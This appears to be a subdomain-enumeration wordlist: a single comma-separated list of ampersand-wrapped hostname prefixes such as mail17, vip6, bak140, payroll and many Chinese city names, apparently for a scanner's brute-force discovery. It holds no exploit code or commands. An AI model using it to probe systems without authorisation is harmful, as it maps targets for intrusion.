,&yyy&,&letter&,&lottery&,&1www&,&mei&,&note&,&sweet&,&ism&,&pine&,&cirrus&,&austria&,&adric&,&game1&,&tdyx&,&wlk&,&fenlei&,&f1i8&,&bak140&,&duoduo&,&camp&,&ecc&,&cdm&,&mcm&,&portugal&,&dick&,&ultra&,&proteus&,&load&,&hui&,&zhongyi&,&s6&,&38&,&qg&,&ip1&,&195&,&shuju&,&garden&,&heart&,&chanel&,&meta&,&realtime&,&sweden&,&astra&,&abell&,&alcor&,&michaelyu&,&qf&,&wuvy&,&mail17&,&us3&,&update1&,&yanglan&,&vip6&,&b4&,&196&,&wxy&,&awbd&,&thinner&,&osp&,&cte&,&his&,&arwen&,&coco&,&programs&,&acf&,&aquila&,&acssys&,&g1&,&cha&,&vip5&,&x5&,&wx1&,&jx3&,&ha1&,&qiushui&,&ey&,&thurs&,&wvu&,&smtp8&,&ep153&,&118&,&bond&,&heb&,&father&,&mail13&,&hg3&,&r4&,&hnh&,&ya&,&vod1&,&145&,&john&,&noah&,&rma&,&hall&,&ireland&,&slc&,&tock&,&abramsky&,&wuxi&,&l1&,&mxqy&,&yc2&,&vip8&,&116&,&odds&,&x3&,&e4&,&84&,&tuangou&,&146&,&csl&,&speech&,&wise&,&yu&,&acr&,&fan&,&gjc&,&thumbs&,&arthur&,&pfb&,&w6&,&zym&,&abc5&,&cdn6&,&aaaa&,&o2o&,&n3&,&d1i8&,&esf&,&dalian&,&s9&,&007&,&a5&,&001&,&jiayuan&,&cc55&,&olympic&,&babel&,&est&,&mtv&,&sparrow&,&acsmac&,&aacckk&,&waw&,&zhifu&,&yi&,&jiaoyou&,&marry&,&rendahua&,&pic3&,&sucai&,&updata&,&zhaosf&,&beihai&,&mmp&,&song&,&ni&,&liao&,&belgium&,&zebra&,&aruba&,&anna&,&asd&,&d4&,&d5&,&tejia&,&234&,&zd&,&jjsg&,&airfiltration&,&a4&,&fee&,&adi&,&eve&,&polls&,&shared&,&comp&,&mts&,&duck&,&streamer&,&abm&,&u2&,&yilian&,&105&,&puter&,&hpv&,&mail18&,&k4&,&honghui&,&aic&,&moscow&,&inc&,&infra&,&barney&,&wlik&,&sjsg&,&vip1&,&g2&,&185&,&142&,&140&,&wyv&,&guizhou&,&hc3&,&dingdan&,&csb&,&can&,&mop&,&baseball&,&cdp&,&phy&,&select&,&abaptiste&,&wvwvv&,&astd&,&z4&,&f8i9&,&wvwy&,&110&,&qvod&,&wxw&,&accel&,&cos&,&ug&,&zion&,&mom&,&israel&,&amsterdam&,&pps&,&forge&,&aces&,&archimedes&,&blackhole&,&trees&,&abecker&,&103&,&yunnan&,&sichuan&,&filters&,&wvwu&,&jiu&,&gcld&,&tangshi&,&mail20&,&fushi&,&tmail&,&announce&,&apricot&,&olympus&,&486&,&baobao&,&tdm&,&guoxue&,&caps&,&agate&,&america&,&bender&,&tornado&,&jinan&,&kq&,&google1&,&zxrj&,&789&,&d8&,&cnc2&,&iphone4&,&3611616wang&,&128&,&dpqk&,&141&,&moto&,&sharp&,&acura&,&human&,&aandrews&,&aau&,&salty&,&134&,&hgc2&,&woman&,&190&,&ued&,&xiaogan&,&qingdao&,&68&,&comment&,&e8&,&155&,&s11&,&nlp&,&orca&,&ise&,&personnel&,&heritage&,&andrew&,&ods&,&abae&,&69&,&m9&,&xiaomi&,&oldefy&,&hc6&,&67&,&cbt&,&face&,&batch&,&rush&,&tux&,&nutrition&,&222&,&83&,&ertong&,&2345&,&wxapi&,&hzw&,&zhi&,&iac&,&rdm&,&des&,&rad&,&guan&,&wrc&,&peace&,&peach&,&ampere&,&techno&,&alderaan&,&vip4&,&gg11&,&by520&,&9158&,&ddns&,&send2&,&qzone&,&hunter&,&tennis&,&oxygen&,&first&,&ppc&,&cmi&,&soe&,&dsa&,&anchorage&,&acca&,&wagner&,&asterix&,&firefly&,&hydrogen&,&176&,&ktv&,&danye&,&gg22&,&phpcms&,&s1i8&,&renren&,&wt1&,&kaifulee&,&zuowen&,&ju&,&wed&,&jiankong&,&ggg&,&achilles&,&cci&,&society&,&aoe&,&w8i9&,&221&,&bookssw&,&mail25&,&abc4&,&r11&,&z1&,&manhua&,&131&,&gslb&,&183&,&wvyw&,&add&,&spot&,&sdb&,&vnwv&,&article&,&zhucheng&,&tupian&,&96&,&caiji&,&333&,&73&,&v8i9&,&hg5&,&imgcache&,&fgh&,&163&,&midas&,&gcc&,&winter&,&aloha&,&administration&,&aanderson&,&efg&,&dx2&,&mail-5&,&zxc&,&mail-7&,&qss&,&weige&,&taizhou&,&121&,&szidc&,&xw&,&mail16&,&170&,&ling&,&aci&,&bat&,&28&,&hk2&,&521&,&q6&,&f4&,&yym&,&jiangmen&,&liyanhong&,&a8i9&,&wly&,&bak66&,&30&,&ime&,&war&,&vd&,&levis&,&acad&,&ans&,&pbs&,&hawaii&,&caribbean&,&head&,&venture&,&great&,&p0&,&r12&,&wt2&,&jiudian&,&wvxw&,&shenyang&,&tsc&,&quiet&,&sherlock&,&sid&,&ukraine&,&payroll&,&xinyang&,&d8i9&,&chqlb&,&send1&,&cdnhk01&,&xajh&,&attachment&,&luntan&,&tiantianyulecheng&,&q1i8&,&scourt&,&wvwx&,&xiazai&,&explorer&,&urban&,&genetics&,&alma&,&yichang&,&kaili&,&wyu&,&us2&,&shuqi&,&hangzhou&,&178&,&lcl&,&dzc&,&esc&,&grs&,&cmis&,&aspen&,&freebsd&,&titania&,&finland&,&fed&,&commercial&,&absinthe&,&absolute&,&pay2&,&jiaju&,&majiang&,&wyx&,&statics&,&04&,&pptv&,&jstm&,&127&,&8888&,&autofilters&,&baili&,&choiskycn&,&cc11&,&otp&,&device&,&mustang&,&pharm&,&wuwei&,&dian&,&wyxw&,&item&,&zhangjiajie&,&pay1&,&gae&,&yyxx&,&i0&,&lego&,&oo&,&atlantic&,&mst&,&script&,&plato&,&yellow&,&amanda&,&bcd&,&ale&,&there&,&xiaohua&,&c8i9&,&cc33&,&jieyang&,&32&,&93&,&07&,&leijun&,&rxhzw&,&funing&,&jiumeiwang&,&106&,&136&,&lofter&,&mgw&,&jing&,&cct&,&acdc&,&aconcagua&,&ghs&,&ef8i9&,&qb1&,&vvww&,&str&,&ecshop&,&youku&,&dianxin&,&06&,&gome&,&liyugang&,&liyong&,&wvy&,&edm2&,&kl&,&intel&,&lotto&,&env&,&seal&,&atc&,&cook&,&andy&,&47&,&e6&,&e1i8&,&ghi&,&ys1&,&s15&,&s10&,&mxk&,&ssq&,&xp&,&agr&,&imap4&,&cheetah&,&csd&,&denmark&,&whale&,&acme&,&oberon&,&aldebaran&,&abajo&,&closet&,&chengdu&,&z8i9&,&ittops&,&186&,&tudou&,&ddos&,&record&,&norway&,&addis&,&dntg&,&bak135&,&tgzt&,&g6&,&aa55&,&renwu&,&107&,&56&,&men&,&pcs&,&cso&,&lee&,&tulip&,&mic&,&adapt&,&anima&,&aarn&,&wywg&,&hk1&,&vwvv&,&taipin&,&ankang&,&lhzs&,&tuixin&,&zhumadian&,&101&,&perf&,&cac&,&pulsar&,&abacis&,&actg&,&zhuanti&,&daiyun&,&qinhuangdao&,&tmall&,&dishes&,&wvyu&,&maka&,&hyz&,&wn&,&pai&,&velocity&,&tran&,&anat&,&announcements&,&capital&,&alexandria&,&abydos&,&xingtai&,&a9&,&vip520&,&ab8i9&,&xiyouji&,&150&,&00&,&wxv&,&wendeng&,&puyang&,&egg&,&secret&,&helium&,&maestro&,&aegir&,&acorn&,&tieling&,&a8&,&zhejiang&,&hg6&,&lu99se&,&wvuy&,&wuyv&,&yinchuan&,&tangshan&,&frxz&,&86&,&479744&,&y8i9&,&ago&,&sic&,&bss&,&dsb&,&line&,&acq&,&miranda&,&abu&,&daili&,&txt&,&aliyun&,&hg1&,&bes&,&hit&,&phil&,&valley&,&adonis&,&the&,&acacia&,&aarnet&,&fuzhou&,&skirt&,&3366&,&hezuo&,&50&,&mcc&,&pas&,&egypt&,&acl&,&river&,&vader&,&audi&,&acoustics&,&aase&,&apk&,&yiwu&,&tianqi&,&frxz2&,&38yulecheng&,&fx1&,&91&,&520&,&qingyuan&,&188&,&108&,&kaihusong16&,&43&,&jianfei&,&jian&,&solo&,&cyclops&,&aatest&,&abt&,&actinium&,&vlwv&,&76&,&81&,&xjz&,&game2&,&tuiguang&,&huo&,&roll&,&thai&,&repair&,&vlab&,&ver&,&retro&,&acid&,&g3&,&fuwu&,&yaying&,&yanbian&,&jiangdou&,&jining1&,&53&,&wish&,&jianzhan&,&456&,&airpurifier&,&aa22&,&179&,&bak19&,&kuitun&,&boke&,&rugby&,&adl&,&ugg&,&109&,&luoyang&,&26&,&siping&,&lvyou&,&older&,&bak144&,&330196&,&zhengzhou&,&tui&,&arp&,&heat&,&answer&,&titanic&,&aegis&,&arm&,&quick&,&wenzhou&,&shopex&,&ha3&,&nnn&,&126379&,&vwvvv&,&laiwu&,&rom&,&fda&,&sohu&,&sgh&,&mail-8&,&55&,&baofengyingyin&,&eladies&,&74&,&mail28&,&byte&,&hardware&,&typhoon&,&jpg&,&plum&,&engr&,&189&,&xinyu&,&twocold&,&quanzhou&,&mail14&,&002&,&wdqk&,&bd3g&,&51&,&bai&,&enigma&,&ser&,&dome&,&ast&,&aeolus&,&xxxxx&,&dnspod&,&xietianxiedi&,&444&,&hebi&,&alb&,&arctic&,&bim&,&lic&,&adsum&,&bozhou&,&simao&,&lwjs&,&22&,&chaoyang&,&lhc&,&65&,&gongyi&,&qipai&,&ceoyulecheng&,&txj&,&henhenlu&,&joy&,&road&,&cargo&,&gss&,&cedar&,&rdc&,&cpd&,&aball&,&chlist&,&vvvvvv&,&g4&,&ara&,&ers&,&abudhabi&,&maxy&,&abete&,&05&,&lorealparis&,&mir2&,&mail19&,&nmc&,&girl&,&leopard&,&agecon&,&agn&,&abbie&,&abasin&,&abamac&,&zyw&,&zxt&,&huabao&,&kaixin&,&yichun&,&lanzhou&,&shaoxing&,&acct&,&als&,&ape&,&52&,&chinafilter&,&wvxujin&,&suqian&,&29&,&lixiaoming&,&aa33&,&zhuji&,&sweep&,&ccr&,&rocky&,&heaven&,&eros&,&achernar&,&dunhua&,&xlfc&,&33&,&vip3&,&langfang&,&180&,&dx1&,&bifen&,&pingxiang&,&35&,&dep&,&satellite&,&synapse&,&beans&,&abulafia&,&abnaki&,&abarron&,&down2&,&tongliao&,&s0&,&dota&,&169&,&changsha&,&25&,&fahao&,&wulanhaote&,&amt&,&arms&,&cjc&,&agony&,&amethyst&,&absolut&,&315&,&fabu&,&10086&,&quban&,&ningbo&,&ershoufang&,&kaiping&,&46&,&mail-6&,&7k7k&,&sph&,&otc&,&coast&,&osprey&,&nanchong&,&luyou&,&hongshizihui&,&youyiku&,&a175738&,&fenxiao&,&chaozhou&,&kaihu&,&sxd&,&vvvw&,&solution&,&dmt&,&analog&,&armstrong&,&mrc&,&administrator&,&anchor&,&aarhus&,&abaton&,&jinhua&,&jiankang&,&79&,&115&,&asqx&,&tonghua&,&baotou&,&ue&,&reading&,&unicorn&,&chs&,&vfwv&,&haining&,&g5&,&ha6&,&cdnimg1&,&fuling&,&zhibo&,&chufa&,&bak8&,&meishan&,&wolverine&,&icarus&,&advisory&,&mail27&,&down4&,&yangzhou&,&mianyang&,&dongguan&,&lishui&,&likaifu&,&xicang&,&shilin&,&bcs&,&prc&,&controller&,&violet&,&lijiang&,&yingtan&,&mail29&,&htgl123&,&89&,&hc1&,&ejee&,&jiexiu&,&wvuw&,&yuxi&,&mxai&,&dnf&,&longhai&,&beat&,&sst&,&abednego&,&changzhou&,&aomen&,&jifen&,&62&,&39&,&41&,&57&,&paipai&,&ddz&,&guanwang&,&yichun1&,&40&,&aix&,&amos&,&jingjiang&,&wangshi&,&jinzhong&,&rayban&,&haerbin&,&77&,&z5&,&zuqiu&,&img03&,&acts&,&ame&,&optics&,&alc&,&certificates&,&poland&,&huainan&,&songyuan&,&jiashan&,&huaihua&,&washed&,&suihua&,&meishi&,&remai&,&4399&,&aiqiyi&,&gaoming&,&linyi&,&vvvv&,&wang&,&set&,&cmail&,&fts&,&abies&,&absurd&,&taiyuan&,&36&,&zhoukou&,&hanzhong&,&jnbd&,&mudanjiang&,&adn&,&aaohub&,&t1i8&,&qp&,&vww&,&liuqiangdong&,&92&,&vvw&,&gouwu&,&foshan&,&changhai&,&pic1&,&qiche&,&weiku&,&zibo&,&tongren&,&xunlei&,&aec&,&cws&,&ifs&,&south&,&arrow&,&aara&,&abaker&,&abenjamin&,&jiaozhou&,&139&,&bazhong&,&k5&,&wb057&,&gongzhuling&,&qingyang&,&jsb&,&acw&,&ach&,&animals&,&mail21&,&yili&,&hg2&,&side&,&zengcheng&,&mgmt&,&arcade&,&yulecheng&,&gmarket&,&qw&,&22591&,&132&,&weinan&,&z2&,&88&,&fuzhou1&,&vvwv&,&caipiao&,&chongzuo&,&swe&,&abi&,&xiangtan&,&27&,&laizhou&,&oulaiya&,&zhongshan&,&anyang&,&gougou&,&bdtg&,&xinji&,&abbey&,&abbot&,&abbe&,&abreo&,&linxia&,&nanping&,&gengxin&,&hjmg&,&chifeng&,&liaoyuan&,&weifang&,&guangyuan&,&shaowu&,&dandong&,&baicheng&,&cheng&,&visitor&,&era&,&bohr&,&feicheng&,&dxz&,&sanya&,&vmwv&,&yantai&,&hefei&,&zjh&,&kaifeng&,&jiamusi&,&guyuan&,&58&,&hrd&,&bmw&,&analyse&,&uss&,&psi&,&abax&,&kaiyuan&,&lcf&,&xlj&,&by120&,&pingliang&,&guanling48&,&qqq&,&mail26&,&rushan&,&huchou&,&a7&,&zhenrenheguan&,&chishui&,&argo&,&luxi&,&agnesi&,&maca&,&78&,&taoke&,&wvvvw&,&66&,&qujing&,&xiangfan&,&abc3&,&34&,&abp&,&aleph&,&above&,&vewv&,&yingkou&,&p1i8&,&yuedu&,&cartoon&,&lims&,&anatomy&,&agni&,&addison&,&abas&,&abol&,&vgwv&,&changzhi&,&g8i9&,&aszt&,&zhenjiang&,&p57&,&kunshan&,&44&,&3gs&,&zhuanlan&,&linhe&,&sanmenxia&,&sims&,&classroom&,&aphrodite&,&adultery&,&yancheng&,&lblist&,&piliang&,&jining&,&90&,&xyx&,&yangquan&,&wvvv&,&place&,&vine&,&amb&,&abba&,&adaptive&,&alaska&,&shijiebei&,&luo&,&vwwvv&,&wuzhou&,&shaoyang&,&61&,&qun&,&meinv&,&anti&,&ddt&,&admins&,&alley&,&ablancha&,&hami&,&pingdingshan&,&anning&,&puning&,&85&,&tiao&,&dlq&,&huadou&,&zi&,&liling&,&aem&,&abn&,&acb&,&accsys&,&down3&,&vkwv&,&xianyang&,&anshan&,&maimai&,&cd8i9&,&rps&,&cherry&,&cave&,&accolade&,&agl&,&abrown&,&adyan&,&bdtb&,&conghua&,&31&,&tieba&,&vwwv&,&putian&,&jixi&,&adagio&,&beast&,&abenakis&,&acro&,&200&,&bssvr&,&duolunduo&,&zhanjiang&,&guilin&,&fuqing&,&112&,&liyang&,&cast&,&abyss&,&legolas&,&acheron&,&abaco&,&advansoft&,&huizhou&,&chenggu&,&zxy&,&jinzhou&,&yakeshi&,&adelie&,&baoshan&,&loudi&,&jiaxing&,&vwvwv&,&tongchuan&,&archer&,&gwy&,&mip&,&ags&,&abare&,&aauobs&,&xuzhou&,&houtai&,&yulin1&,&kkk&,&abc1&,&72&,&595688&,&zhangjiakou&,&xiantao&,&americas&,&analyst&,&surgery&,&jhs&,&ziyang&,&qiqihaer&,&jiangyou&,&e8i9&,&tengzhou&,&wvwvw&,&37&,&24&,&agra&,&aauscion&,&abouhaidar&,&zhangzhou&,&liuan&,&xiangcheng&,&hengshui&,&analyzer&,&abeille&,&academico&,&vomv&,&vawv&,&jiuquan&,&alm&,&megatron&,&adrastea&,&ablem&,&ville&,&baiyin&,&yueyang&,&kunming&,&4s&,&eat&,&adidas&,&ark&,&cim&,&lrc&,&bite&,&acci&,&changshu&,&maweidu&,&linan&,&mail22&,&biao&,&64&,&douyun&,&pulandian&,&annex&,&street&,&adelaide&,&tongxiang&,&5s&,&huaian&,&zoucheng&,&23&,&guigang&,&shuangseqiu&,&maanshan&,&chile&,&adept&,&80&,&vbwv&,&zhuzhou&,&yuncheng&,&abc2&,&shishi&,&ezhou&,&ylc1&,&cet&,&wuhu&,&wawa&,&abush&,&vdwv&,&tonglu&,&bengbu&,&jurong&,&wvwv&,&huangshi&,&jiangyan&,&vwv&,&asgard&,&abstract&,&anakin&,&acvax&,&eerduosi&,&nanan&,&fuxin&,&huludao&,&serv&,&lgj&,&adventurer&,&agnew&,&tongling&,&zhaoqing&,&shangluo&,&danyang&,&zuoxuan&,&yining&,&liupanshui&,&euclid&,&adder&,&acdspmo&,&blc&,&zhaotong&,&jiyuan&,&wvvvv&,&sanming&,&crash&,&holly&,&able&,&60&,&lvliang&,&taian&,&binzhou&,&lvshun&,&temai&,&vwvw&,&xianggelila&,&wvvwv&,&els&,&las&,&agi&,&bay&,&pelican&,&acamar&,&accord&,&a6&,&adb&,&room&,&bzml&,&jishou&,&94&,&xiaoshan&,&82&,&mail24&,&lincang&,&jiangyin&,&doctor&,&adele&,&adrenaline&,&jingyan&,&deyang&,&luzhou&,&jincheng&,&xining&,&618486&,&yuhuan&,&nation&,&adstudgw&,&pinglun&,&haimen&,&kashen&,&70&,&shantou&,&21112&,&jingmen&,&gejiu&,&zigong&,&pathology&,&abner&,&abudget&,&haikou&,&gubaotou&,&exm&,&vvwwv&,&shuozhou&,&suyu&,&98&,&sams&,&vhwv&,&xiamen&,&shiyan&,&panjin&,&pinghu&,&taizhou1&,&vjwv&,&baoji&,&abigail&,&heze&,&xinxiang&,&zufang&,&xuancheng&,&liaoyang&,&songjiang&,&accr&,&acai&,&laixi&,&cangzhou&,&activestat&,&weihai&,&jiaoyu&,&jingdezhen&,&fenghua&,&49&,&cjb&,&jjh&,&abmac&,&abakus&,&abdemo&,&actino&,&rugao&,&nanning&,&yiyang&,&akesu&,&fladmin&,&yulin&,&ningde&,&cem&,&erc&,&acapulco&,&optimus&,&nantong&,&zhuhai&,&dazhou&,&dyx&,&guangan&,&chaohu&,&yongkang&,&tengchong&,&epp&,&aids&,&cove&,&yanji&,&guwen&,&liuzhou&,&cib&,&acu&,&zhangye&,&shuangyashan&,&rongcheng&,&lclmj&,&87&,&acspc&,&anqing&,&3gwww&,&lianyungang&,&jsc&,&acrc&,&abdul&,&xiangxiang&,&shihezi&,&wuhai&,&xiangyin&,&jinghong&,&mianxian&,&alipay&,&wanzhou&,&shouguang&,&advise&,&amis&,&zhangjiagang&,&ganyu&,&shexian&,&abekas&,&anshun&,&lasa&,&shengdiao&,&datong&,&wafangdian&,&aos&,&acri&,&qitaihe&,&zrm&,&z6&,&enshi&,&ttyulecheng&,&ruian&,&agrajag&,&aboyle&,&acton&,&fever&,&xichang&,&vcwv&,&tacheng&,&sight&,&eec&,&abend&,&aber&,&handan&,&yanan&,&yixing&,&haicheng&,&22cn107173&,&lingbao&,&i8i9&,&fangchenggang&,&zdy&,&54&,&tvlist&,&kelamayi&,&yangjiang&,&birch&,&acropolis&,&abrownpc&,&simply&,&kuerle&,&suizhou&,&pingdu&,&cer&,&adrian&,&wenling&,&jinjiang&,&zunyi&,&suining&,&luohe&,&wvv&,&jiaonan&,&zhaodong&,&chenzhou&,&huhehaote&,&jiaozuo&,&tongzhou&,&42&,&acrux&,&achat&,&meizhou&,&guiyang&,&freshman&,&acadia&,&agnet&,&adunn&,&tianmen&,&jimo&,&ankara&,&abruzzi&,&longyan&,&yibin&,&shangrao&,&apr&,&alum&,&acrout&,&abvax&,&xingyi&,&sleek&,&wulumuqi&,&cixi&,&shangyu&,&alcatraz&,&chizhou&,&hengyang&,&45&,&abelard&,&benxi&,&huanggang&,&abepc&,&adymnos&,&xianning&,&neijiang&,&baoding&,&jintan&,&yongzhou&,&abk&,&quzhou&,&rizhao&,&nanyang&,&taixing&,&dongyang&,&tulufan&,&vvwvv&,&panzhihua&,&y1&,&wujiang&,&baishan&,&jingzhou&,&shangqiu&,&yuyao&,&linfen&,&rikaze&,&huangshan&,&chuzhou&,&xinghua&,&penglai&,&ever&,&jjs&,&ady&,&abirakosppp&,&aginfo&,&y3&,&liaocheng&,&huaibei&,&ganzhou&,&dezhou&,&xuanhua&,&amelia&,&fushun&,&nanchang&,&county&,&viwv&,&zhangqiu&,&aether&,&acsgate&,&chibi&,&rrr&,&hetian&,&changchun&,&taicang&,&quhui&,&and&,&abender&,&tianshui&,&actgw&,&chuxiong&,&shuyang&,&laibin&,&abilene&,&h8i9&,&shaoguan&,&abney&,&y2&,&changle&,&geermu&,&jiujiang&,&abh&,&leshan&,&gaoyou&,&qionghai&,&zaozhuang&,&jrb&,&yaan&,&uuu&,&alderon&,&zhoushan&,&adroit&,&actel&,&xiangshan&,&changde&,&angola&,&aberger&,&huzhou&,&qiannan&,&yanzhou&,&abachi&,&gou&,&qinzhou&,&adrien&,&actd&,&absaroka&,&actin&,&qidong&,&mail23&,&qingzhou&,&daqing&,&xuchang&,&maoming&,&changji&,&fuyang&,&abrothers&,&acruz&,&dongying&,&bole&,&meihekou&,&xinzhou&,&ablomgren&,&chengde&,&abelbeck&,&abulfeda&,&abutler&,&heyuan&,&linguistics&,&argus&,&inf&,&maya&,&dallas&,&con&,&icm&,&nebula&,&logger&,&smt&,&grace&,&aalto&,&pn&,&sgw&,&dsl&,&spc&,&pascal&,&ibis&,&marx&,&pec&,&plasma&,&spm&,&rhea&,&pictures&,&rg&,&edp&,&dis&,&greece&,&hci&,&hep&,&sysadmin&,&thesis&,&ship&,&pace&,&otter&,&george&